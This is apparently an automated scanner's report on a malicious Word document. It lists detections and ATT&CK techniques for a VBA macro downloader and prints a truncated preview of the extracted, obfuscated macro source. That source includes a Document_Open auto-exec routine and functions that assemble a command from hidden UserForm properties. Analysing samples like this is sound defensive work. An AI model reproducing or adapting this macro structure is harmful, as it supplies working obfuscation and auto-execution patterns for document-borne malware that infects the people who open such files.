MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample contains heavily obfuscated VBA macros, including a hidden UserForm, which are designed to execute automatically upon opening the document. The heuristics indicate this is a command stager that likely downloads and executes a second-stage payload. ClamAV detection further supports its malicious nature as a downloader.
Heuristics 8
-
ClamAV: Doc.Downloader.Generic-7458497-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7458497-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8116 bytes |
SHA-256: b09c06f84adc830d046000b1676bee87f6548ae37c306caa6f9de690f60a9594 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Xbfyggbstkga"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Wauxlzlc, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Luznhagujg
Dim Rfycnzjafv
For Smwinhpyipi = Bhtzmdsez To 0
Vjigffzyym = xPI
Liadthpqju = CDbl(3)
Yhcqbabxi = Tan(MyeW5A)
Qbuaqfruafvb = 4 - Uoisadandhy
Wxktevpkc = (3 - Zkrauzdfd)
Msehmscxm = Xvwplqgjes
Spmatees = CDbl(6)
Plspxjxhf = Tan(Mnvefomy)
Next
Dim Yytwjyvix
Dim Kdjofrql
For Zgmdbcvqam = Bhtzmdsez To 0
Pesvmxgzovyn = xPI
Qkxonoduyrhs = CDbl(3)
Arxdrrnfwjftf = Tan(MyeW5A)
Diyigmkslytpu = 4 - Otojzwyv
Hkoniuje = (3 - Jijbkqzleybs)
Vlevaaemcezbw = Dkkxkqfj
Ixnqxbolsswpn = CDbl(6)
Qwfecituianrv = Tan(Pbswrdrwf)
Next
Dim Klslsejbzaz
Dim Ksmxqqtrjdhk
For Trqmwmbw = Bhtzmdsez To 0
Kbvtpxxukhh = xPI
Fmwexahlao = CDbl(3)
Jincftokwmo = Tan(MyeW5A)
Blgmawvmelaai = 4 - Aeknudfojseo
Psyaewpbzzrfd = (3 - Nbwptkscabwww)
Wicqosbadhgz = Voaarwrhyz
Pxziasefdjcmq = CDbl(6)
Ashnlnremv = Tan(Acojdfrde)
Next
Smykpfwt
End Sub
Attribute VB_Name = "Oqumvzjp"
Attribute VB_Base = "0{7C177D75-0098-48AF-8580-0D1375B79E0E}{95A7C57D-8104-4632-958D-2EBE40DFBDBD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Azqrtcoqmf"
Function Wwrkgqfdymayp()
Dim Qvvkowza
Dim Foyahmvhaevm
For Dckgafceeg = Bhtzmdsez To 0
Gfdumjevuxh = xPI
Cvhhdgdekh = CDbl(3)
Talpbjsfsf = Tan(MyeW5A)
Frmhwqgur = 4 - Kuxazrlwyqiti
Tnontwfcb = (3 - Whtbruzbbuej)
Hjroxydoqxs = Acesvoev
Wznthrlp = CDbl(6)
Zlmooenrhqwi = Tan(Zzxciuosegu)
Next
Opqppdwpfvcl = Xbfyggbstkga.Wauxlzlc
Dim Tnkiynjopecq
Dim Zgxhjpmpwo
For Kwubjcpioncco = Bhtzmdsez To 0
Mpzuqfkdpv = xPI
Ledqwezdnuov = CDbl(3)
Wylevsvd = Tan(MyeW5A)
Wtouasegziedk = 4 - Ypkysbeup
Slaryheduc = (3 - Cvphvrwsn)
Wdkfhyszzlnzt = Kwzgcdikhc
Jctqzemdnncw = CDbl(6)
Dqtpvvbm = Tan(Sglvoscceeiwf)
Next
Jlwltcrxb = Opqppdwpfvcl + Oqumvzjp.Uieffhcfse + Oqumvzjp.Wippwwxuo + Oqumvzjp.Kkwblgmjvpege
Dim Bezxkryjfebcq
Dim Pdtfpvpisvwg
For Qmbngqngvhp = Bhtzmdsez To 0
Cjhsbjkor = xPI
Qelwhcok = CDbl(3)
Psapjtdjhlqc = Tan(MyeW5A)
Ylcuwacyrzw = 4 - Rzsteynnr
Sqgfkikn = (3 - Xwaunoqqabsgo)
Osmecahezc = Woiojoftdsyq
Wqejlctvvqyil = CDbl(6)
Rarhuucsmjs = Tan(Gwtvugdqzprd)
Next
Ebtpnkgh = Jlwltcrxb + Oqumvzjp.Uefnidjhjk + Oqumvzjp.Iraetijoqp
Dim Uujpjalhkv
Dim Tiodjvronaxf
For Vytlxtsrra = Bhtzmdsez To 0
Dwbvjmekcawvm = xPI
Dvtwegzfno = CDbl(3)
Iabrnrlsunsrl = Tan(MyeW5A)
Gvbyzahovxdhq = 4 - Ngkovkajidae
Dclcitjlqzx = (3 - Gtjjvodzlg)
Ngmsuzwqy = Sfhkicqlruxu
Ufporrvowvmxt = CDbl(6)
Alnoxrenevxvu = Tan(Pmwtaugbhb)
Next
Wwrkgqfdymayp = Iodadywfwqg + Ebtpnkgh + Iodadywfwqg
Dim Ujzuwnkdyath
Dim Ztjagbbrbbnj
For Kqzhkgynhcn = Bhtzmdsez To 0
Cyzklvyuxvi = xPI
Qdhxhmutshal = CDbl(3)
Vmlgnlmztcrb = Tan(MyeW5A)
Xnvrhrpvfjva = 4 - Kryypdchmouoh
Egfyzwflie = (3 - Agclnlqp)
Smktpahx = Xladqbazeg
Jabbkdhcrcia = CDbl(6)
Oggedlkvfofz = Tan(Kqkuoyckrn)
Next
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.